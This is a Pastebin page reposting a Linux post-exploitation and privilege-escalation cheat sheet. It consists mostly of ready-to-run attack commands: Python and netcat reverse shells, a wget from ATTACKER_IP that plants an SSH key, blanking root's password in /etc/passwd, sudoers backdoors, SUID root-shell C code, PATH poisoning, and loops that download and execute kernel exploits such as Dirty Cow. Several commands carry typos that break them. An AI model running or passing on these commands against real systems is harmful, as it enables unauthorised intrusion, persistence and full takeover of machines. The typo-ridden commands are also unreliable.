API tools faq
paste
Advertisement
mathio3

Linux elevation of privileges

mathio3
Aug 8th, 2018
1,493
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 11.11 KB | None | 0 0
raw download clone embed print report
  1. * Post exploitation
  2. #mathio.DZ  
  3. #+213{E0FDDAE2E60E040C2BC259EC8F8FC02CA22FB801363D3611BD83FB0934A3FE43B7738128F8513F3658B4F13FAE86BE4B7F4B140341FE08948EE20A516F620850 }
  4. Shell Spawning
  5.  
  6. python -c 'import pty; pty.spawn("/bin/sh")'
  7. echo os.system('/bin/bash')
  8. /bin/sh -i
  9. perl —e 'exec "/bin/sh";'
  10. perl: exec "/bin/sh";
  11. ruby: exec "/bin/sh"
  12. lua: os.execute('/bin/sh')
  13. (From within IRB)
  14. exec "/bin/sh"
  15. (From within vi)
  16. :!bash
  17. (From within vi)
  18. :set shell=/bin/bash:shell
  19. (From within nmap)
  20. !sh
  21.  
  22. <Ctrlz> bg/stty raw -echo/fg/reset
  23.  
  24. Set PATH TERM and SHELL if missing:
  25.  
  26. export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  27. export TERM=xterm
  28. export SHELL=bash
  29. alias ls='ls -alt --block-size=M'
  30. alias fh='find . |grep'
  31. Add public key to authorized keys:
  32.  
  33. $ echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys
  34.  
  35.  
  36.  @h@* Escaping limited interpreters
  37.  
  38. Some payloads to overcome limited shells:
  39.  
  40. $ ssh user@$ip nc $localip 4444 -e /bin/sh
  41.     enter user's password
  42. $ python -c 'import pty; pty.spawn("/bin/sh")'
  43. $ export TERM=linux
  44.  
  45. $ python -c 'import pty; pty.spawn("/bin/sh")'
  46.  
  47. $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),   *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  48.  
  49. $ echo os.system('/bin/bash')
  50.  
  51. $ /bin/sh -i
  52.  
  53. $ exec "/bin/sh";
  54.  
  55. $ perl —e 'exec "/bin/sh";'
  56.  
  57. From within tcpdump
  58.  
  59. $ echo $’id\n/bin/netcat $ip 443 -e /bin/bash’ > /tmp/.test
  60. chmod +x /tmp/.test
  61. sudo tcpdump -ln -I eth- -w /dev/null -W 1 -G 1 -z /tmp/.tst -Z root
  62.  
  63. From busybox
  64.  
  65. $ /bin/busybox telnetd -|/bin/sh -p9999
  66.  
  67. :!bash
  68. :set shell=/bin/bash:shell
  69. !bash
  70. find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
  71. awk 'BEGIN {system("/bin/bash")}'
  72. --interactive
  73. echo "os.execute('/bin/sh')"
  74. sudo nmap --script=exploit.nse
  75. perl -e 'exec "/bin/bash";'
  76.  
  77.  
  78. Linux elevation of privileges, manual testing
  79. Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo),miss-@h@configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.
  80.  
  81. First try simple sudo:
  82.  
  83. $ sudo su -
  84.  
  85. What can we run with sudo?
  86.  
  87. $ sudo -l
  88.  
  89. Try su as all users and the username as password
  90.  
  91. What services are running as root?:
  92.  
  93. $ ps aux | grep root
  94.  
  95. Look for vulnerable/privileged components such as: mysql, sudo, udev, python
  96.  
  97. If /etc/exports if writable, you can add an NFS entry or change and existing entry adding the no_root_squash @h@flag to a root directory, put a binary with SUID bit on, and get root.
  98.  
  99. If there is a cronjob that runs as run but it has incorrect file permissions, you can change it to run your @h@SUID binary and get a shell.
  100.  
  101. The following command will list processes running by root, permissions and NFS exports.
  102.  
  103. $ echo 'services running as root'; ps aux | grep root;  echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
  104.  
  105. Use netstat to find other machines connected
  106.  
  107. $ netstat -ano
  108.  
  109. Command to skip ignored lines in config files
  110.  
  111. $ alias nonempty="egrep -v '^[ \t]*#|^$'"
  112.  
  113. If Mysql is running as root, you can run commands using sys_exec(). For instance, to add user to sudoers:
  114.  
  115. sys_exec('usermod -a -G admin username')
  116.  
  117. More about mysql:
  118.  
  119. https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
  120.  
  121. Find linux distribution & version
  122.  
  123. $ cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;
  124.  
  125. Architecture
  126.  
  127. $ cat /proc/version; uname -a; uname -mrs; rpm -q kernel; dmesg | grep Linux; ls /boot | grep vmlinuz-; file /bin/ls; cat /etc/lsb-release
  128.  
  129. Environment variables
  130.  
  131. $ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
  132.  
  133. Find printers
  134.  
  135. $ lpstat -a
  136.  
  137. Find apps installed;
  138.  
  139. $ ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archivesO; ls -alh /var/cache/yum/*;
  140.  
  141. Find writable configuration files
  142.  
  143. $ find /etc/ -writable -type f 2>/dev/null
  144.  
  145. Miss-configured services
  146.  
  147. $ cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
  148.  
  149. Scheduled jobs
  150.  
  151. $ crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny
  152.  
  153. Grep hardcoded passwords
  154.  
  155. $ grep -i user [filename]
  156. grep -i pass [filename]
  157. grep -C 5 "password" [filename]
  158. find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
  159.  
  160. if web server run in web root:
  161.  
  162. $ grep "localhost" ./ -R
  163.  
  164. Network configuration
  165.  
  166. $ /sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/sysconfig/network; cat /etc/networks; iptables -L; hostname; dnsdomainname
  167.  
  168. List other users home directories
  169.  
  170. $ ls -ahlR /root/; ls -ahlR /home/
  171.  
  172. User bash history
  173.  
  174. $ cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
  175.  
  176. User mails
  177.  
  178. $ cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
  179.  
  180. Find interesting binaries
  181.  
  182. $ find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp
  183.  
  184. Mounted filesystems
  185.  
  186. $ mount; df -h; cat /etc/fstab
  187.  
  188. Look for binaries with the SUID or GUID bits set.
  189.  
  190. $ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
  191. $ find / -perm -1000 -type d 2>/dev/null
  192. $ find / -perm -g=s -type f 2>/dev/null
  193.  
  194. Adding a binary to PATH, to hijack another SUID binary invokes it without the fully qualified path.
  195.  
  196. $ function /usr/bin/foo () { /usr/bin/echo "It works"; }
  197. $ export -f /usr/bin/foo
  198. $ /usr/bin/foo
  199.     It works
  200.  
  201. if you can just change PATH, the following will add a poisoned ssh binary:
  202.  
  203.  set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
  204.  echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
  205. chmod +x ssh
  206.  
  207. Generating SUID C Shell for /bin/bash
  208.  
  209. int main(void){
  210.    setresuid(0, 0, 0);
  211.     system("/bin/bash");
  212. }
  213.  
  214. Without interactive shell
  215.  
  216. $ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
  217.  
  218. If you can get root to execute anything, the following will change a binary owner to him and set the SUID @h@flag:
  219.  
  220. $ chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;
  221.  
  222. If /etc/passwd has incorrect permissions, you can root:
  223.  
  224.  $ echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
  225.  
  226. Add user www-data to sudoers with no password
  227.  
  228. $ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
  229.  
  230. If you can sudo chmod:
  231.  
  232. $echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c $ sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid
  233.  
  234. Wildcard injection if there is a cron with a wildcard in the command line, you can create a file, whose name @h@will be passed as an argument to the cron task, For more info:
  235.  
  236. https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
  237.  
  238. compile exploit fix error
  239.  
  240. $ gcc 9545.c -o 9545 -Wl,--hash-style=both
  241.  
  242. Find other uses in the system
  243.  
  244.  $id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l
  245.  
  246. World readable/writable files:
  247.  
  248. $ echo "world-writeable folders"; find / -writable -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -222 -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -o w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o x -type d 2>/dev/null; echo "world-writeable & executable folders"; find / \( -perm -o w -perm -o x \) -type d 2>/dev/null;
  249.  
  250. Find world-readable files:
  251.  
  252. $ find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
  253.  
  254. Find nobody owned files
  255.  
  256. $ find /dir -xdev \( -nouser -o -nogroup \) -print
  257.  
  258. Add user to sudoers in python.
  259.  
  260. #!/usr/bin/env python
  261. import os
  262. import sys
  263. try:
  264.         os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
  265. except:
  266.         sys.exit()
  267.  
  268. Ring0 kernel exploit for 2.3/2.4
  269.  
  270. wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0
  271.  
  272. Inspect web traffic
  273.  
  274. $ tcpdump tcp port 80 -w output.pcap -i eth0
  275.  
  276.  
  277. Scripts to run
  278.  
  279. The following script runs exploit suggester and automatically downloads and executes suggested exploits:
  280.  
  281. https://raw.githubusercontent.com/codingo/OSCP-1/master/xploitdeli.py
  282.  
  283. wget http://www.securitysift.com/download/linuxprivchecker.py
  284.  
  285. wget https://github.com/pentestmonkey/unix-privesc-check
  286.  
  287. Other scripts:
  288.  
  289. wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
  290.  
  291. wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
  292.  
  293. wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
  294.  
  295. wget https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl
  296.  
  297. wget  https://www.rebootuser.com/?p=1758
  298.  
  299. Exploits worth running
  300.  
  301. CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
  302.  
  303. https://www.exploit-db.com/exploits/15285/
  304.  
  305. Linux Kernel <= 2.6.37 'Full-Nelson.c'
  306.  
  307. https://www.exploit-db.com/exploits/15704/
  308.  
  309. CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
  310.  
  311. https://git.zx2c4.com/CVE-2012-0056/about/
  312.  
  313. Linux CVE 2012-0056
  314.  
  315. wget -O exploit.c <http://www.exploit-db.com/download/18411>
  316.   gcc -o mempodipper exploit.c
  317.   ./mempodipper
  318.  
  319. CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
  320.  
  321. https://dirtycow.ninja/
  322.  
  323. Compile dirty cow:
  324.  
  325. g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
  326.  
  327. Cross compiling exploits
  328.  
  329. $ gcc -m32 -o output32 hello.c #(32 bit)
  330. $
 gcc -m64 -o output hello.c # (64 bit)
  331.  
  332. Linux 2.6.32
  333.  
  334. https://www.exploit-db.com/exploits/15285/
  335.  
  336. Open an xterm remotely
  337.  
  338. First, run an xserver in your machine
  339.  
  340. $ Xnest :1
  341.  
  342. Then, bind it to xterm, again in your machine:
  343.  
  344. $ xterm -display 127.0.0.1:1
  345.  
  346. Finally, run the follwing in the remote machine:
  347.  
  348. $ /usr/openwin/bin/xterm -display yourip:1
  349.  
  350. Get proof
  351.  
  352. $ echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
  353.  
  354. Elevation in 2.6.x:
  355.  
  356. $ for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
  357.  
  358. source:https://guif.re/linuxeop
  359. #mathio
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!